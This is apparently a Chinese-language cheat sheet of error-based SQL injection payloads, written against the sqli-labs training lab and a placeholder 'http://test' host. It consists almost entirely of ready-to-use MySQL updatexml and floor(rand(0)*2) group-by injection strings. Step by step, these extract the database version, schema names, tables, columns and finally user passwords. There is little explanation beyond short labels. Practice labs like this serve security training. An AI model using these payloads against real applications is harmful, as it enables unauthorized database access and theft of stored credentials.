报错注入语句

一、sql语句报错注入过程

报错注入

http://192.168.255.199/Tkitn/sqli-labs-master/Less-5/index.php

 

?id=2' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) -- -（数据库版本）

 

http://192.168.255.199/Tkitn/sqli-labs-master/Less-5/index.php

?id=2' and updatexml(1,concat(0x7e,(select (table_name) from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)-- -（emails）

 

http://192.168.255.199/Tkitn/sqli-labs-master/Less-5/index.php

?id=2' and updatexml(1,concat(0x7e,(select (column_name) from information_schema.columns where table_name="users" limit 0,1),0x7e),1)-- -（users）

二、表、列、字段报错注入

1、注出所有表

http://test

?id=1' and (select 1 from (select count(*),concat(((select (schema_name) from information_schema.schemata limit 0,1)),floor (rand(0)*2))x from information_schema.tables group by x)a) -- -

http://test

?id=2'and (select 1 from (select count(*),concat(((select concat(schema_name,';') from information_schema.schemata limit 0,1)),floor (rand(0)*2))x from information_schema.tables group by x)a) -- -

2、当前数据库

http://test

?id=2' and (select 1 from (select count(*),concat(((select concat(database(),';'))),floor (rand(0)*2))x from information_schema.tables group by x)a) -- -

3、当前数据库的表

http://test

?id=2' and (select 1 from (select count(*),concat(((select concat(table_name,';') from information_schema.tables where table_schema='security' limit 0,1)),floor (rand(0)*2))x from information_schema.tables group by x)a) -- -

4、列名

http://test

?id=2' and (select 1 from (select count(*),concat(((select concat(column_name,';') from information_schema.columns where table_name='users' limit 5,1)),floor (rand(0)*2))x from information_schema.tables group by x)a) -- -

5、报字段

http://test

?id=2' and (select 1 from (select count(*),concat(((select concat(password,';') from users limit 0,1)),floor (rand(0)*2))x from information_schema.tables group by x)a) -- -